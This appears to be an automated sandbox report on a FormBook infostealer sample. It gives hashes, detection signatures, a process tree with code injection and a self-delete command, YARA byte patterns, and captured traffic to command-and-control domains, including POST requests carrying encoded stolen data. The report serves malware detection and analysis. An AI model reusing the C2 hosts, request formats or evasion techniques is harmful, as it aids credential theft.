Loading ...

Play interactive tourEdit tour

Analysis Report Scan_06032020.exe

Overview

General Information

Sample Name:Scan_06032020.exe
MD5:c2f53f0cfafa04b343af62cccedcee13
SHA1:b189bf5ac157a99e16b4b81200bb08c6d9b55e7c
SHA256:459e0f1ce8ec71d78d27f50fa6978046b9fb741f322f66cb300332fce233da25

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Scan_06032020.exe (PID: 2616 cmdline: 'C:\Users\user\Desktop\Scan_06032020.exe' MD5: C2F53F0CFAFA04B343AF62CCCEDCEE13)
    • Scan_06032020.exe (PID: 4304 cmdline: {path} MD5: C2F53F0CFAFA04B343AF62CCCEDCEE13)
      • explorer.exe (PID: 2880 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)
        • NETSTAT.EXE (PID: 4024 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 4520 cmdline: /c del 'C:\Users\user\Desktop\Scan_06032020.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • ufipp6ljxlz.exe (PID: 4924 cmdline: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe MD5: C2F53F0CFAFA04B343AF62CCCEDCEE13)
          • ufipp6ljxlz.exe (PID: 4316 cmdline: {path} MD5: C2F53F0CFAFA04B343AF62CCCEDCEE13)
        • wlanext.exe (PID: 4168 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18429:$sqlite3step: 68 34 1C 7B E1
    • 0x1853c:$sqlite3step: 68 34 1C 7B E1
    • 0x18458:$sqlite3text: 68 38 2A 90 C5
    • 0x1857d:$sqlite3text: 68 38 2A 90 C5
    • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
    00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x106519:$sqlite3step: 68 34 1C 7B E1
      • 0x10662c:$sqlite3step: 68 34 1C 7B E1
      • 0x132139:$sqlite3step: 68 34 1C 7B E1
      • 0x13224c:$sqlite3step: 68 34 1C 7B E1
      • 0x106548:$sqlite3text: 68 38 2A 90 C5
      • 0x10666d:$sqlite3text: 68 38 2A 90 C5
      • 0x132168:$sqlite3text: 68 38 2A 90 C5
      • 0x13228d:$sqlite3text: 68 38 2A 90 C5
      • 0x10655b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x106683:$sqlite3blob: 68 53 D8 7F 8C
      • 0x13217b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x1322a3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.Scan_06032020.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.Scan_06032020.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18429:$sqlite3step: 68 34 1C 7B E1
        • 0x1853c:$sqlite3step: 68 34 1C 7B E1
        • 0x18458:$sqlite3text: 68 38 2A 90 C5
        • 0x1857d:$sqlite3text: 68 38 2A 90 C5
        • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
        4.2.Scan_06032020.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        17.2.ufipp6ljxlz.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          17.2.ufipp6ljxlz.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18429:$sqlite3step: 68 34 1C 7B E1
          • 0x1853c:$sqlite3step: 68 34 1C 7B E1
          • 0x18458:$sqlite3text: 68 38 2A 90 C5
          • 0x1857d:$sqlite3text: 68 38 2A 90 C5
          • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 7 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for domain / URLShow sources
          Source: www.porcber.comVirustotal: Detection: 7%Perma Link
          Source: http://www.porcber.comVirustotal: Detection: 7%Perma Link
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\Qor0xv4i\ufipp6ljxlz.exeVirustotal: Detection: 16%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\Qor0xv4i\ufipp6ljxlz.exeReversingLabs: Detection: 48%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Scan_06032020.exeVirustotal: Detection: 16%Perma Link
          Source: Scan_06032020.exeReversingLabs: Detection: 48%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.604818443.0000000001460000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1159857332.0000000002E60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.558930048.00000000043CC000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.891510039.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.895810906.0000000000340000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1157158132.0000000000AE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.604415201.00000000013D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.603513720.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.893009636.0000000000E80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.Scan_06032020.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.ufipp6ljxlz.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.ufipp6ljxlz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Scan_06032020.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 17.2.ufipp6ljxlz.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.Scan_06032020.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Uses netstat to query active network connections and open portsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: GET /mq3/?1bxh=3fSHFPhPtFX80vu0&qFNHgHIH=zRviVb12Px76SVCKitHf+uVyG4hjRZm88E4tC4j/EoSJrWOXPrlkHBEChoOc3I+b1pYC HTTP/1.1Host: www.icbjesusdenazaret.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mq3/?qFNHgHIH=2djJOWHKUa/XxXSGb5U/NgPrp1f7EPZ+3gOEC9jiqnhi3aunmcDc7upH1tDbPKdrqRi+&1bxh=3fSHFPhPtFX80vu0 HTTP/1.1Host: www.porcber.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mq3/?1bxh=3fSHFPhPtFX80vu0&qFNHgHIH=KqoVQGmIJAwVdvnbXHFhC3/cGIUPqT0Z2GEszuVtRwHyjq2IhIJtEgxo1RriYdWCfaHj HTTP/1.1Host: www.hugoph.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 199.34.228.59 199.34.228.59
          Source: Joe Sandbox ViewASN Name: unknown unknown
          Source: Joe Sandbox ViewASN Name: unknown unknown
          Source: Joe Sandbox ViewASN Name: unknown unknown
          Source: Joe Sandbox ViewASN Name: unknown unknown
          Source: global trafficHTTP traffic detected: POST /mq3/ HTTP/1.1Host: www.porcber.comConnection: closeContent-Length: 146542Cache-Control: no-cacheOrigin: http://www.porcber.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.porcber.com/mq3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 71 46 4e 48 67 48 49 48 3d 7e 5f 76 7a 51 32 6d 62 65 74 69 71 69 55 72 38 43 63 41 35 58 30 48 6b 6e 58 37 39 54 72 5a 48 67 48 7a 5a 45 36 37 69 6a 6b 64 65 33 72 71 41 77 74 7e 7a 70 35 63 73 33 73 28 41 45 75 52 59 75 30 61 48 4e 46 4d 66 64 65 4a 7a 52 4c 68 74 28 6f 6c 43 53 4a 68 50 62 53 49 47 50 33 6a 6f 36 6c 41 30 76 32 61 6f 32 39 66 79 71 72 46 61 59 4a 78 79 66 65 6e 44 78 32 46 7a 37 75 7e 32 30 36 58 39 57 6f 56 6e 45 53 48 6d 79 4c 32 33 49 78 78 70 76 58 52 64 74 5f 56 35 62 76 52 50 66 53 70 43 69 6c 4b 45 53 74 64 7a 65 4c 44 55 28 4c 41 61 46 76 75 7a 37 70 35 4d 65 49 51 6d 57 54 33 76 38 62 4c 6b 36 67 72 68 46 57 34 44 68 75 30 74 79 72 33 68 73 79 28 68 62 65 56 32 79 79 4f 49 51 36 6e 73 42 77 56 61 6f 6a 4f 53 43 49 68 6f 48 54 45 74 6a 50 30 42 50 36 58 4c 66 50 4d 55 44 57 73 48 68 72 6a 46 61 2d 54 6f 48 66 64 71 34 32 50 41 6d 45 44 77 64 7a 49 4f 59 69 39 43 53 36 45 6a 63 4a 74 34 70 63 50 49 55 72 77 5a 48 4a 48 6a 75 31 4c 69 41 63 6b 7a 46 79 45 52 49 34 30 4b 33 79 34 64 4f 62 48 43 78 33 65 53 66 65 32 4b 51 54 67 39 30 47 50 74 44 6e 33 52 6f 50 75 7a 56 75 74 4c 59 64 4b 39 46 39 63 31 4a 63 68 56 4f 7a 7e 30 4c 45 69 69 46 54 70 69 28 45 67 30 35 53 71 73 6e 34 34 4c 74 7a 28 61 39 49 6f 44 6d 48 54 77 6d 42 65 69 65 34 34 4d 35 61 37 4a 7a 4c 69 68 69 70 68 36 31 6f 6a 37 61 6e 76 61 52 45 52 63 72 78 5a 7a 79 63 48 77 38 79 6e 39 75 71 64 71 28 68 47 44 4a 44 4c 73 46 4c 51 6f 7a 65 39 71 35 35 55 35 77 78 63 33 62 6a 77 73 68 34 4c 62 5a 38 51 66 37 64 38 4b 72 6d 5a 68 53 42 6a 64 64 76 76 47 41 4e 76 56 67 37 44 4e 77 2d 78 7a 79 56 36 6c 4f 31 54 6e 36 71 69 6b 37 33 56 4e 41 42 4e 58 77 53 43 56 64 55 50 61 65 4d 38 76 54 44 71 64 30 4d 55 78 46 54 68 68 55 58 31 4b 4b 5f 73 4b 36 63 70 31 6c 56 6f 69 7e 32 71 44 54 4f 76 4b 37 59 39 46 7a 56 72 6c 47 77 43 50 34 63 74 6e 30 55 74 41 39 4a 64 51 50 6e 52 4c 32 6a 65 32 4a 34 6a 41 5a 55 76 66 76 72 41 51 31 6d 61 69 46 69 51 65 79 51 46 5f 77 58 49 4d 4c 33 67 52 6b 56 79 44 7e 4a 75 4c 30 73 67 61 4f 6e 58 4a 35 65 39 42 67 30 32 44 6e 72 4f 7a 6b 7a 41 75 63 41 36 56 59 52 4d 52 42 71 73 57 53 6f 4a 66 45 6b 45 36 7a 49 45 56 52 59 48 56 46 30 41 30 66 37 79 34 62 65 41 61 79 76 69 57 39 31 4b 6f 64 42 4d 4b 69 31 51 4e 73 47 79 30 62 4a 78 38 78 30 58 52 4f 58 74 72 53 79 4c 79 4f 4b 4e 41 50 46 4a 4c 75 65 65 44 63 51 67 4f 36 7a 56 64 51 48 4d 5f 53 72 6f 6b 42 70 58 62 70 5a 38 48 68 4a 61 4d 34 45 42 4e 59 6f 75 46 64 4f 41 5f 4f 69 7a 61 76 52 7a 4a 70 32 7e 34 39 54 57 2d 39 78 28 68 44 4d 6f 62 55 58 6f 62 31 55 4b 6f 43 49 76 79 6d 4f 6a 5f 31 48 7
          Source: global trafficHTTP traffic detected: POST /mq3/ HTTP/1.1Host: www.hugoph.comConnection: closeContent-Length: 146542Cache-Control: no-cacheOrigin: http://www.hugoph.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hugoph.com/mq3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 71 46 4e 48 67 48 49 48 3d 43 49 6b 76 4f 68 6a 4d 43 6d 64 32 4b 75 36 6a 4a 51 51 34 62 43 48 39 48 34 6b 7a 69 6a 73 79 67 44 46 4c 6f 76 6c 69 64 68 44 71 69 61 65 51 69 62 45 49 44 67 30 76 72 67 7a 61 46 66 57 68 65 38 6e 43 53 4c 74 58 44 71 66 6d 37 4c 75 78 4a 4a 45 58 52 4d 55 71 66 64 6a 6b 48 4d 70 5a 48 64 33 4f 7a 58 59 45 45 58 50 73 47 49 7a 2d 39 37 35 2d 74 4c 30 6d 77 6f 6d 72 51 5a 4a 63 57 55 55 46 36 41 68 4a 58 44 38 78 44 54 57 75 73 31 78 43 7e 77 53 4e 52 50 38 65 70 70 64 78 41 50 46 4c 49 62 41 4c 46 58 46 31 64 62 59 45 42 75 78 2d 49 45 50 74 6c 63 55 72 76 36 4c 47 63 52 78 48 54 47 62 74 28 65 33 53 33 7a 74 45 55 48 46 31 35 6d 6a 61 70 64 68 71 50 64 56 58 62 46 62 43 70 6e 72 49 6c 73 38 54 69 52 32 61 33 5f 56 68 50 4d 49 4b 39 36 67 6e 37 79 62 32 6d 46 33 4d 52 77 39 68 4f 54 54 54 76 4f 41 63 71 52 79 67 39 35 58 4e 64 45 34 57 51 79 33 48 4d 2d 6e 6e 53 72 42 30 52 55 6f 66 43 6c 49 76 76 76 70 68 5a 46 64 6c 68 4f 33 61 53 45 61 41 69 4a 6c 42 46 52 47 72 55 73 66 45 63 45 63 44 63 53 74 4d 4c 33 61 71 6b 79 62 41 4c 4a 50 30 74 45 51 5f 31 71 33 67 63 41 50 55 64 66 65 32 76 45 6b 49 72 52 57 67 63 5f 46 67 51 4e 33 51 56 61 38 30 71 68 6d 72 6e 68 6b 68 75 49 77 54 6e 50 7e 6f 62 43 66 34 58 6d 72 6b 39 4d 63 37 69 46 6c 38 49 74 72 47 76 72 50 71 69 32 48 5f 76 2d 4d 7a 33 6e 74 37 79 52 72 74 54 4a 66 58 6d 37 54 33 73 43 35 4b 64 68 37 31 37 4d 31 64 6c 47 4d 6c 33 35 47 6d 4e 55 42 52 48 30 35 71 49 74 6f 6e 62 53 39 47 6a 4d 54 6a 36 44 59 59 62 54 72 7a 5a 4e 4c 66 56 39 61 4b 28 36 65 51 45 52 37 41 68 59 65 45 37 77 59 6b 56 73 72 58 37 39 77 62 6a 74 76 64 69 6a 32 4e 42 34 7e 55 56 6e 62 68 76 66 6a 68 61 37 52 45 74 7a 66 77 6f 39 59 32 4d 4e 30 2d 65 6a 36 42 35 66 73 7a 73 53 78 70 45 32 4e 46 52 42 78 68 79 35 67 78 72 53 4c 56 62 6b 6a 61 6c 43 73 52 4f 65 4b 41 62 38 35 42 34 79 4c 2d 64 53 58 31 6f 56 44 32 54 45 68 79 38 67 35 37 51 41 73 41 66 64 33 5f 50 4e 31 33 72 42 75 65 76 6e 56 78 32 41 4c 43 62 42 72 4a 50 72 28 59 31 75 75 7a 4c 4c 51 54 43 70 77 48 39 36 42 35 39 46 55 5a 68 6d 50 35 62 30 6b 4a 38 68 4a 4e 55 34 38 36 75 69 61 58 6c 42 4f 58 69 71 66 41 38 4b 6e 49 41 74 6e 32 44 75 33 30 64 65 66 59 6d 75 37 57 35 58 34 39 6f 42 73 59 47 6d 38 6c 4f 69 5a 45 69 35 35 32 79 68 50 45 41 70 66 58 30 6b 37 77 47 50 7e 4f 59 4c 7a 64 4d 4c 49 78 78 41 63 32 50 6a 61 36 39 42 65 48 47 50 4d 78 6b 31 75 52 69 6a 6f 71 50 43 55 32 67 74 74 77 71 41 6f 75 56 64 4e 75 55 59 62 67 76 35 79 4e 6d 37 39 6a 58 64 48 42 39 31 61 46 37 79 6d 50 62 6c 7e 36 50 72 59 52 69 73 30 44 4b 4e 78 69 63 49 43 5
          Source: global trafficHTTP traffic detected: GET /mq3/?1bxh=3fSHFPhPtFX80vu0&qFNHgHIH=zRviVb12Px76SVCKitHf+uVyG4hjRZm88E4tC4j/EoSJrWOXPrlkHBEChoOc3I+b1pYC HTTP/1.1Host: www.icbjesusdenazaret.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mq3/?qFNHgHIH=2djJOWHKUa/XxXSGb5U/NgPrp1f7EPZ+3gOEC9jiqnhi3aunmcDc7upH1tDbPKdrqRi+&1bxh=3fSHFPhPtFX80vu0 HTTP/1.1Host: www.porcber.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mq3/?1bxh=3fSHFPhPtFX80vu0&qFNHgHIH=KqoVQGmIJAwVdvnbXHFhC3/cGIUPqT0Z2GEszuVtRwHyjq2IhIJtEgxo1RriYdWCfaHj HTTP/1.1Host: www.hugoph.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.icbjesusdenazaret.net
          Source: unknownHTTP traffic detected: POST /mq3/ HTTP/1.1Host: www.porcber.comConnection: closeContent-Length: 146542Cache-Control: no-cacheOrigin: http://www.porcber.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.porcber.com/mq3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 71 46 4e 48 67 48 49 48 3d 7e 5f 76 7a 51 32 6d 62 65 74 69 71 69 55 72 38 43 63 41 35 58 30 48 6b 6e 58 37 39 54 72 5a 48 67 48 7a 5a 45 36 37 69 6a 6b 64 65 33 72 71 41 77 74 7e 7a 70 35 63 73 33 73 28 41 45 75 52 59 75 30 61 48 4e 46 4d 66 64 65 4a 7a 52 4c 68 74 28 6f 6c 43 53 4a 68 50 62 53 49 47 50 33 6a 6f 36 6c 41 30 76 32 61 6f 32 39 66 79 71 72 46 61 59 4a 78 79 66 65 6e 44 78 32 46 7a 37 75 7e 32 30 36 58 39 57 6f 56 6e 45 53 48 6d 79 4c 32 33 49 78 78 70 76 58 52 64 74 5f 56 35 62 76 52 50 66 53 70 43 69 6c 4b 45 53 74 64 7a 65 4c 44 55 28 4c 41 61 46 76 75 7a 37 70 35 4d 65 49 51 6d 57 54 33 76 38 62 4c 6b 36 67 72 68 46 57 34 44 68 75 30 74 79 72 33 68 73 79 28 68 62 65 56 32 79 79 4f 49 51 36 6e 73 42 77 56 61 6f 6a 4f 53 43 49 68 6f 48 54 45 74 6a 50 30 42 50 36 58 4c 66 50 4d 55 44 57 73 48 68 72 6a 46 61 2d 54 6f 48 66 64 71 34 32 50 41 6d 45 44 77 64 7a 49 4f 59 69 39 43 53 36 45 6a 63 4a 74 34 70 63 50 49 55 72 77 5a 48 4a 48 6a 75 31 4c 69 41 63 6b 7a 46 79 45 52 49 34 30 4b 33 79 34 64 4f 62 48 43 78 33 65 53 66 65 32 4b 51 54 67 39 30 47 50 74 44 6e 33 52 6f 50 75 7a 56 75 74 4c 59 64 4b 39 46 39 63 31 4a 63 68 56 4f 7a 7e 30 4c 45 69 69 46 54 70 69 28 45 67 30 35 53 71 73 6e 34 34 4c 74 7a 28 61 39 49 6f 44 6d 48 54 77 6d 42 65 69 65 34 34 4d 35 61 37 4a 7a 4c 69 68 69 70 68 36 31 6f 6a 37 61 6e 76 61 52 45 52 63 72 78 5a 7a 79 63 48 77 38 79 6e 39 75 71 64 71 28 68 47 44 4a 44 4c 73 46 4c 51 6f 7a 65 39 71 35 35 55 35 77 78 63 33 62 6a 77 73 68 34 4c 62 5a 38 51 66 37 64 38 4b 72 6d 5a 68 53 42 6a 64 64 76 76 47 41 4e 76 56 67 37 44 4e 77 2d 78 7a 79 56 36 6c 4f 31 54 6e 36 71 69 6b 37 33 56 4e 41 42 4e 58 77 53 43 56 64 55 50 61 65 4d 38 76 54 44 71 64 30 4d 55 78 46 54 68 68 55 58 31 4b 4b 5f 73 4b 36 63 70 31 6c 56 6f 69 7e 32 71 44 54 4f 76 4b 37 59 39 46 7a 56 72 6c 47 77 43 50 34 63 74 6e 30 55 74 41 39 4a 64 51 50 6e 52 4c 32 6a 65 32 4a 34 6a 41 5a 55 76 66 76 72 41 51 31 6d 61 69 46 69 51 65 79 51 46 5f 77 58 49 4d 4c 33 67 52 6b 56 79 44 7e 4a 75 4c 30 73 67 61 4f 6e 58 4a 35 65 39 42 67 30 32 44 6e 72 4f 7a 6b 7a 41 75 63 41 36 56 59 52 4d 52 42 71 73 57 53 6f 4a 66 45 6b 45 36 7a 49 45 56 52 59 48 56 46 30 41 30 66 37 79 34 62 65 41 61 79 76 69 57 39 31 4b 6f 64 42 4d 4b 69 31 51 4e 73 47 79 30 62 4a 78 38 78 30 58 52 4f 58 74 72 53 79 4c 79 4f 4b 4e 41 50 46 4a 4c 75 65 65 44 63 51 67 4f 36 7a 56 64 51 48 4d 5f 53 72 6f 6b 42 70 58 62 70 5a 38 48 68 4a 61 4d 34 45 42 4e 59 6f 75 46 64 4f 41 5f 4f 69 7a 61 76 52 7a 4a 70 32 7e 34 39 54 57 2d 39 78 28 68 44 4d 6f 62 55 58 6f 62 31 55 4b 6f 43 49 76 79 6d 4f 6a 5f 31 48 7
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jun 2020 07:23:52 GMTServer: ApacheSet-Cookie: is_mobile=0; path=/; domain=www.icbjesusdenazaret.netVary: X-W-SSL,User-AgentSet-Cookie: language=en; expires=Thu, 18-Jun-2020 07:23:52 GMT; Max-Age=1209600; path=/Cache-Control: privateX-Host: pages23.sf2p.intern.weebly.netX-UA-Compatible: IE=edge,chrome=1Content-Length: 3803Content-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 67 64 70 72 2f 67 64 70 72 73 63 72 69 70 74 2e 6a 73 3f 62 75 69 6c 64 54 69 6d 65 3d 31 35 39 31 32 31 32 39 39 30 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 63 64 6e 31 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 64 65 76 65 6c 6f 70 65 72 2f 6e 6f 6e 65 2e 69 63 6f 22 20 2f 3e 0a 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 